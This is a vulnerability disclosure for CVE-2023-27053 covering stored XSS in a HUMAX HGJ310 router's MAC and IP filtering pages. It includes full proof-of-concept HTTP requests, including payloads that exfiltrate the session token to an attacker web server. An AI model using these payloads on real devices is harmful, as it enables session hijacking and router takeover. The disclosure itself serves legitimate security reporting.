/XSS-HGJ310

CVE-2023-27053 - The cross-site scripting (XSS) vulnerability in the macFiltering and portIpFiltering endpoints allows attackers to insert javascript code through the macAddress and ipAddress parameters. The vulnerability affects the HUMAX DO BRASIL INDÚSTRIA ELETRÔNICA LTDA Model HGJ310 (CLARO) BRGCAI 1.0.69 router

CVE-2023-27053

The cross-site scripting (XSS) vulnerability in the macFiltering and portIpFiltering endpoints allows attackers to insert javascript code through the macAddress and ipAddress parameters. The vulnerability affects the HUMAX DO BRASIL INDÚSTRIA ELETRÔNICA LTDA Model HGJ310 (CLARO) BRGCAI 1.0.69 router.

Vendor HUMAX Co., Ltd.
Model HGJ310
Technology DOCSIS 3.1
Hardware version 1.0
Software version BRGCAI 1.0.69

Cross Site Scripting - MAC filtering feature

Locate: Configurações avançadas > Menu > Segurança > Controle de acesso > Filtragem por MAC

Stored XSS

Concept Proof:

POST /api/v1/service/macFiltering HTTP/1.1
Host: 192.168.0.1
User-Agent: Firefox
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Access-Token: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
X-Requested-With: XMLHttpRequest
Content-Length: 60
Connection: close

{"active":true,"macAddress":"<script>alert('xss')</script>"}

When accessing, the script is executed:

http://192.168.0.1/#page-security-mac-filtering

image

Session Hijacking

Start web server:

python3 -m http.server 80

Concept Proof:

POST /api/v1/service/macFiltering HTTP/1.1
Host: 192.168.0.1
User-Agent: Firefox
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Access-Token: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
X-Requested-With: XMLHttpRequest
Content-Length: 122
Connection: close

{"active":true,"macAddress":"<script> new Image().src='http://192.168.0.72/?='+sessionStorage.getItem('token');</script>"}

The client accesses and the session token is sent to the attacker:

http://192.168.0.1/#page-security-mac-filtering

image

Python3 receiving session token:

image

Cross Site Scripting - IP filtering feature

Locate: Configurações avançadas > Menu > Segurança > Controle de acesso > Filtragem por IP

Stored XSS

Concept Proof:

POST /api/v1/service/portIpFiltering HTTP/1.1
Host: 192.168.0.1
User-Agent: Firefox
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Access-Token: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
X-Requested-With: XMLHttpRequest
Content-Length: 77
Connection: close

{"ipAddress":"<script>alert('xss')</script>","active":true,"protocol":"both"}

When accessing, the script is executed:

http://192.168.0.1/#page-security-ip-filtering

image

Session Hijacking

Start web server:

python3 -m http.server 80

Concept Proof:

POST /api/v1/service/portIpFiltering HTTP/1.1
Host: 192.168.0.1
User-Agent: Firefox
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Access-Token: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
X-Requested-With: XMLHttpRequest
Content-Length: 139
Connection: close

{"ipAddress":"<script> new Image().src='http://192.168.0.72/?='+sessionStorage.getItem('token');</script>","active":true,"protocol":"both"}

The client accesses and the session token is sent to the attacker:

http://192.168.0.1/#page-security-ip-filtering

image

Python3 receiving session token:

image